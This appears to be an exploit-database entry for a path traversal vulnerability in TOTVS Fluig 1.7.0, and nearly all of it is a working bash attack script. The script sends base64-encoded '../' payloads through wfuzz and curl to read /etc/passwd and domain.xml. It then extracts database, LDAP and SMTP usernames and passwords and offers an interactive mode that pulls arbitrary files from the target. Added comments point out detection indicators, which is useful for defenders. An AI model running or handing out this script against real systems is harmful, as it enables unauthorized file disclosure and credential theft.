
Fluig 1.7.0 Path Traversal

Published: 05 Mar 2021 00:00:00. Reported by: Lucas Souza. Type: packetstorm. Source: packetstormsecurity.com.

Fluig 1.7.0 Path Traversal vulnerability in TOTVS Fluig software allows remote attackers to read sensitive files and potentially execute arbitrary code

Code
`# Exploit Title: Fluig 1.7.0 - Path Traversal  
# Date: 26/11/2020  
# Exploit Author: Lucas Souza  
# Vendor Homepage: https://www.totvs.com/fluig/  
# Version: <== 1.7.0-210217  
# Tested on: 1.7.0-201124  
  
#!/bin/bash  
# Fluig 1.7.0 path-traversal proof of concept (xfluig.sh).
# Usage, as printed by enum: ./xfluig.sh FLUIG_ADDRESS[:PORT] REQUESTS_WFUZZ
# Needs bash, curl, wfuzz and base64; the sed calls in domain-xml use \o033,
# a GNU sed escape.
# Every probe this script sends is a GET to
#   $url/volume/stream/Rmx1aWc=/<base64 of a query string>
# where the decoded query carries a 'file=' parameter made of '../' hops
# (see create-payload). That request shape is the thing to alert on server-side.
# Local artefacts: payload.txt, wordlist.txt and banner in the working
# directory, plus report/<host>/<file> written by enum and manual-mode.
url="$1"  
# Target base URL; enum strips http:// or https:// from it to name the report dir.
npayload=$2  
# Number of 'id' values to try per candidate path; enum defaults it to 25 when empty.
> payload.txt  
# Start from an empty results file (later wfuzz runs overwrite it).
curl -s https://raw.githubusercontent.com/lucxssouza/banners/main/xFluig/banner > banner  
# Downloads the ASCII banner from GitHub on every run, unchecked: offline runs get
# an empty 'banner' file and the later 'cat banner' prints nothing. The fetch is
# itself a host-side indicator that the tool was executed.
# -- FUNCTIONS --  
  
# Fill wordlist.txt with candidate query strings for the traversal endpoint.
# Globals read:  npayload - upper bound for the 'id' parameter (loop runs 1..npayload)
# Files written: wordlist.txt - truncated first, then 4 lines per id value:
#                two Windows-style targets and two Linux-style targets.
# enum and manual-mode later feed this file to wfuzz with encoder=base64 and
# append each encoded line to $url/volume/stream/Rmx1aWc=/.
function create-payload {  
> wordlist.txt  
count=1  
while [[ $count -le $npayload ]]; do  
# WINDOWS PAYLOAD  
echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt  
echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../users/public/desktop/desktop.ini" >> wordlist.txt  
# LINUX PAYLOAD  
echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../etc/passwd" >> wordlist.txt  
echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt  
# $[ ] is the deprecated bash arithmetic form of $(( ))
count=$[$count + 1]  
done  
}  
  
# Interactive prompt loop entered at the end of enum (and again from domain-xml).
# Commands, matched after lowercasing and turning '\' into '/':
#   info   - clear screen, print banner, parse report/<host>/domain.xml via domain-xml
#   clear  - clear the screen
#   target - reset XmlPayload, prompt for a new target and wordlist size, run enum
#   <path> - anything else is requested as a file through the traversal endpoint
#            and, on an HTTP 200, saved under report/<host>/
# Globals read:  url, param, mdr - all set by enum
# Globals set:   XmlPayload (cleared), DirPath, path, mkfile, pwd
# Files written: wordlist.txt, payload.txt, report/$mdr/<path with '/' turned into '-'>
# Control flow: 'while :' never exits on its own; 'info' and 'target' both end in a
# nested manual-mode/enum call, so this frame is never resumed afterwards.
function manual-mode {  
while :; do  
echo  
echo -e "\033[0;31m[!] VALID MANUAL MODE COMMANDS\033[0m"  
echo  
echo -e "\033[0;32m -[ clear - Clear Screen\033[0m"  
echo -e "\033[0;32m -[ target - Set a target\033[0m"  
echo -e "\033[0;32m -[ director/file - Ex: /etc/passwd\033[0m"  
echo -e "\033[0;32m -[ info - Target info and parse 'domain.xml' file ( require target )\033[0m"  
echo  
echo -n -e "\033[0;31mMANUAL MODE >>\033[0m "; read -r input2  
# Normalise the input: backslashes become slashes, then everything is lowercased.
path=$(echo $input2 | sed 's/\\/\//g' | tr '[:upper:]' '[:lower:]')  
# Report file name: every '/' becomes '-' and the first '-' is dropped
# ("/etc/passwd" -> "etc-passwd").
mkfile=$(echo $path | sed 's/\//-/g' | sed 's/-//' | tr '[:upper:]' '[:lower:]')  
if [[ $path == 'info' ]]; then  
clear  
cat banner  
domain-xml  
elif [[ $path == 'clear' ]]; then  
clear  
elif [[ $path == 'target' ]]; then  
XmlPayload=''  
echo  
# Prompts for a new target and wordlist size, then re-runs enum (nested call).
echo -n -e "\033[0;31mINSERT TARGET >> \033[0m"; read url  
echo -n -e "\033[0;31mWORDLIST SIZE >> \033[0m"; read -i npayload  
enum  
else  
echo  
# Single-entry wordlist: the query prefix enum discovered ($param) + '../' hops + the typed path.
echo "$param../../../../../../../../../../../../..$path" > wordlist.txt  
# wfuzz base64-encodes the entry; --sc 200 keeps only HTTP 200 responses, and the
# grep/cut chain pulls the encoded payload out of wfuzz's default output layout.
wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f2 | grep 200 | cut -d'"' -f2 > payload.txt  
DirPath=$(head -1 payload.txt)  
if [[ $DirPath == '' ]]; then  
echo  
echo -e ' \033[0;33m[!] COMMAND OR DIRECTORY/FILE NOT FOUND - TYPE HELP\033[0m'  
else  
# Re-request the hit with curl and keep the body under report/<host>/.
curl -s $url/volume/stream/Rmx1aWc=/$DirPath > report/$mdr/$mkfile  
echo  
echo -e '\033[0;31m'$path'\033[0m'  
echo  
cat report/$mdr/$mkfile  
echo  
pwd=$(pwd)  
echo  
echo -e '\033[0;33m'[!] FILE SAVE IN, $pwd/report/$mdr/$mkfile'\033[0m'  
fi  
fi  
done  
}  
  
# Print a summary of the saved report/<host>/domain.xml (the 'info' command).
# Globals read:  mdr, url, XmlPayload - set by enum
# Files read:    report/$mdr/domain.xml (written by enum, blanks already stripped)
# Output: the target's Server header, the payload that located the file (decoded
# and base64), then sections for database connection URLs, user names and
# passwords, LDAP settings, and SMTP settings. Each section is a grep on one
# element name with sed rewriting the tags into coloured labels and stripping
# the ${env.FLUIG_*:...} wrappers. The \o033 escapes are GNU sed syntax.
# Ends by calling manual-mode again (nested; the calling loop never resumes).
function domain-xml {  
# 'ls | grep' only checks that a file named *domain.xml* exists in the report dir.
domain=$(ls report/$mdr | grep domain.xml)  
if [[ $domain == '' ]]; then  
echo  
echo -e '\033[0;33m[!] DOMAIN.XML FILE NOT FOUND\033[0m'  
else  
echo  
echo -e ' \033[0;32m | TOTVS FLUIG - [+] XML ANALISYS\033[0m'  
echo  
echo -e ' \033[0;33m[!] INFORMATION\033[0m'  
echo  
# HEAD request; only the Server response header is shown.
curl -s -I $url | grep Server  
echo  
echo -e '\033[0;31mTarget\033[0m'  
echo $url  
echo  
echo -e '\033[0;31mPayload plaintext\033[0m'  
echo $XmlPayload | base64 -d  
echo  
echo  
echo -e '\033[0;31mPayload base64 encoded\033[0m'  
echo $XmlPayload  
echo  
echo -e ' \033[0;31m[!] DATABASE CONNECTIONS FOUNDS\033[0m'  
echo  
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep connection-url | sed 's/<connection-url>/\o033[0;31mDB CONNECT >> \o033[0m/g' | sed 's/<\/connection-url>/ \o033[0;31m<< \o033[0m/g' | sed 's/${env.FLUIG_DATABASE_URL://g' | sed 's/}//g'  
echo  
echo -e ' \033[0;31m[!] USERS/PASSWORDS FOUNDS\033[0m'  
echo  
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep user-name | sed 's/<user-name>/ \o033[0;31mUSER >> \o033[0m/g' | sed 's/<\/user-name>/ \o033[0;31m<< \o033[0m /g' | sed 's/${env.FLUIG_DATABASE_USER://g' | sed 's/}//g'   
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep password'>' | sed 's/<password>/\o033[0;31m PASSWORD >> \o033[0m/g' | sed 's/<\/password>/ \o033[0;31m<< \o033[0m/g' | sed 's/${env.FLUIG_DATABASE_PASSWORD://g' | sed 's/}//g'  
echo  
echo -e ' \033[0;31m[!] LDAP INTEGRATIONS\033[0m'  
echo   
# Blank stripping above is why the patterns match 'module-optionname=...' with no space.
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep ldap:// | sed 's/<module-optionname="java.naming.provider.url"value="/\o033[0;31mDOMAIN SERVER >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'  
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep baseCtxDN | sed 's/<module-optionname="baseCtxDN"value="/\o033[0;31mDISTINGUISHED NAME >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'  
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.principal | sed 's/<module-optionname="java.naming.security.principal"value="/\o033[0;31mUSER ADMIN >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'  
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.credentials | sed 's/<module-optionname="java.naming.security.credentials"value="/\o033[0;31mPASSWORD >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'  
echo  
echo -e ' \033[0;31m[!] SMTP SETTINGS\033[0m'  
echo  
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep remote-destination | sed 's/<remote-destinationhost="/\o033[0;31mSMTP ADDRESS >> \o033[0m/g' | sed 's/\/>/ \o033[0;31m<< \o033[0m /g' | sed 's/${env.FLUIG_SMTP_HOST://g' | sed 's/${env.FLUIG_HOST_ADDRESS://g' | sed 's/${env.FLUIG_SMTP_PORT//g'| sed 's/}//g'  
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep smtp-server | sed 's/<smtp-serveroutbound-socket-binding-ref="mail-smtp"//g' | sed 's/\/>//g' | sed 's/password="/\o033[0;31mPASSWORD >> \o033[0m/g' | sed 's/"username="/\o033[0;31m USER >> \o033[0m/g' | sed 's/}//g' | sed 's/${env.FLUIG_SMTP_USERNAME://g' | sed 's/${env.FLUIG_SMTP_PASSWORD://g'  
echo  
# Nested call: a fresh prompt loop starts here and the caller's loop is never resumed.
manual-mode  
fi  
}  
  
# Main flow: derive the report directory from the target, generate the wordlist,
# run wfuzz against the traversal endpoint, look for domain.xml, then drop into
# manual-mode (which never returns).
# Globals read:  url, npayload - from the command line or manual-mode's 'target'
# Globals set:   mdr (report subdirectory), payload, param, XmlPayload
# Files written: report/$mdr/ (created), wordlist.txt, payload.txt,
#                report/$mdr/domain.xml when the file was retrieved
function enum {  
# Report dir name = url with 'https://' / 'http://' removed and the FIRST remaining
# '/' removed (no 'g' flag), so any further path in $url ends up in the directory path.
mdr=$(echo $url | sed 's/https:\/\///' | sed 's/http:\/\///' | sed 's/\///')  
mkdir -p report/$mdr  
if [[ $url == '' ]]; then  
# No target given: show usage and go straight to the interactive prompt.
clear  
cat banner  
echo -e ' \033[0;31m-[ Usage Ex1: ./xfluig.sh FLUIG_ADDRESS REQUESTS_WFUZZ\033[0m'  
echo -e ' \033[0;31m-[ Ex2: ./xfluig.sh FLUIG_ADDRESS:PORT REQUESTS_WFUZZ\033[0m'  
echo -e ' \033[0;31m-[ ( ./xfluig.sh fluig.host.com:8080 1000 )\033[0m'  
manual-mode  
elif [[ $npayload == '' ]]; then  
# Default wordlist size when the second argument is missing.
npayload=25  
clear  
cat banner  
echo -e ' \033[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION\033[0m'  
echo  
echo -e '\033[0;31m[>>] GENERATING PAYLOAD WORDLIST\033[0m'  
echo  
create-payload  
else  
clear  
cat banner  
echo -e ' \033[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION\033[0m'  
echo  
echo -e '\033[0;31m[>>] GENERATING PAYLOAD WORDLIST\033[0m'  
create-payload  
fi  
echo  
echo -e '\033[0;31m[>>] RUNNING WFUZZ - WAIT\033[0m'  
echo  
# One request per wordlist line, base64-encoded into the URL; only HTTP 200
# responses are kept. The cut/grep chain depends on wfuzz's default output layout.
wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt  
# First successful (base64) payload, or empty when nothing returned 200.
payload=$(head -1 payload.txt)  
if [[ $payload == '' ]]; then  
clear  
cat banner  
echo -e ' \033[0;32m | TOTVS FLUIG - PATH ENUMERATION AND XML ANALISYS \033[0m'  
echo  
echo -e '\033[0;33m[!] DIRECTORY/FILE NOT FOUND OR TARGET NOT VULNERABLE\033[0m'  
echo  
manual-mode  
else  
# Decoded payload up to the first '.': the query prefix ending in 'file=' that
# worked (the wordlist lines contain no '.' before the '../' hops). Reused by
# manual-mode for ad-hoc paths.
param=$(echo $payload | base64 -d | cut -d '.' -f1)  
clear  
cat banner  
echo -e ' \033[0;32m | TOTVS FLUIG - [+] STATUS\033[0m'  
echo  
echo -e ' \033[0;33m[!] VULNERABLE\033[0m'  
echo  
echo -e '\033[0;31m[>>] SEARCHING DOMAIN.XML FILE\033[0m'  
# Two candidate locations for domain.xml (Windows and Linux install layouts).
echo "$param../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" > wordlist.txt  
echo "$param../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt  
wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt  
clear  
cat banner  
echo -e ' \033[0;32m | TOTVS FLUIG - [+] STATUS\033[0m'  
echo  
echo -e ' \033[0;33m[!] VULNERABLE\033[0m'  
echo  
# HEAD request; only the Server response header is shown.
curl -s -I $url | grep Server  
echo  
echo -e '\033[0;31mTarget\033[0m'  
echo $url  
echo  
echo -e '\033[0;31mPayload plaintext\033[0m'  
echo $payload | base64 -d  
echo  
echo  
echo -e '\033[0;31mPayload base64 encoded\033[0m'  
echo $payload  
echo  
fi  
# payload.txt now holds the domain.xml search result (or is unchanged when the
# first search found nothing and manual-mode was entered above).
XmlPayload=$(head -1 payload.txt)  
if [[ $XmlPayload == '' ]]; then  
echo  
echo -e '\033[0;33m[!] DOMAIN.XML FILE NOT FOUND\033[0m'  
manual-mode  
else  
# Save domain.xml with all blanks removed; domain-xml's sed patterns rely on that.
curl -s $url/volume/stream/Rmx1aWc=/$XmlPayload | sed 's/[[:blank:]]//g' > report/$mdr/domain.xml  
echo  
echo -e '\033[0;33m[!] DOMAIN.XML FILE FOUND - TYPE "INFO" TO PARSE\033[0m'  
manual-mode  
fi  
}  
# Script body: everything runs through enum, which ends in manual-mode's prompt loop.
enum  
`


Vulners AI Score: 7.4 (High risk)